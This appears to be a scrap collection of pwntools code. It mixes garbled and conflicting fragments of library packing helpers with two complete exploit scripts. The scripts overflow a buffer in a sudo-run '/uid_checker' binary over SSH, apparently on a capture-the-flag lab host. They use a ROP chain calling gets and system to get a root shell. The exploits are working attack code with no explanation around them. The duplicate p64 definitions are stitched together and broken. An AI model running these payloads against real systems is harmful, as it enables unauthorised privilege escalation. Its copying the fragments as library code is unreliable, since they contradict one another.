def __str__(self, count=1): if self.rbp == 0: self.rbp = count payload = p64(self.addr) payload += p64(0) + p64(self.rbp) payload += p64(self.target) payload += p64(self.edi) + p64(self.rsi) payload += p64(self.rdx) payload += p64(self.addr - 0x1a) return payload
def p64(self, *a, **kw): return self.send(packing.p64(*a, **kw))
def p64(self, address, data, *a, **kw): return self.write(address, packing.p64(data, *a, **kw)) def p32(self, address, data, *a, **kw): return self.write(address, packing.p32(data, *a, **kw))
def p64(self, address, data, *a, **kw): """Writes a 64-bit integer ``data`` to the specified ``address``""" return self.write(address, packing.p64(data, *a, **kw))
#!/usr/bin/env python3 from pwn import cyclic from pwnlib.tubes.ssh import ssh from pwnlib.util.packing import p64 offset = 88 payload = cyclic(offset) payload += p64(0x400803) # pop rdi; ret payload += p64(0x601060) # [arg0] rdi = 6295648 payload += p64(0x4005b0) payload += p64(0x400803) # pop rdi; ret payload += p64(0x601060) # [arg0] rdi = 6295648 payload += p64(0x400570) s = ssh(host='10.10.139.182', user='******') p = s.process(['sudo', '/uid_checker']) print(p.recv()) p.sendline(payload) print(p.recv()) p.sendline("/bin/sh") p.interactive()
from pwn import cyclic from pwnlib.tubes.ssh import ssh from pwnlib.util.packing import p64 offset = 88 # Found with ropstar payload = cyclic(offset) payload += p64(0x400803) # pop r15; ret payload += p64(0x601060) # .bss payload += p64(0x4005b0) # gets() payload += p64(0x400803) # pop r15; ret payload += p64(0x601060) # .bss payload += p64(0x400570) # system() s = ssh(host='10.10.202.250', user='******', keyfile='./id_rsa') p = s.process(['sudo', '/uid_checker']) print(p.recv()) p.sendline(payload) print(p.recv()) p.sendline("/bin/sh") p.interactive(prompt='')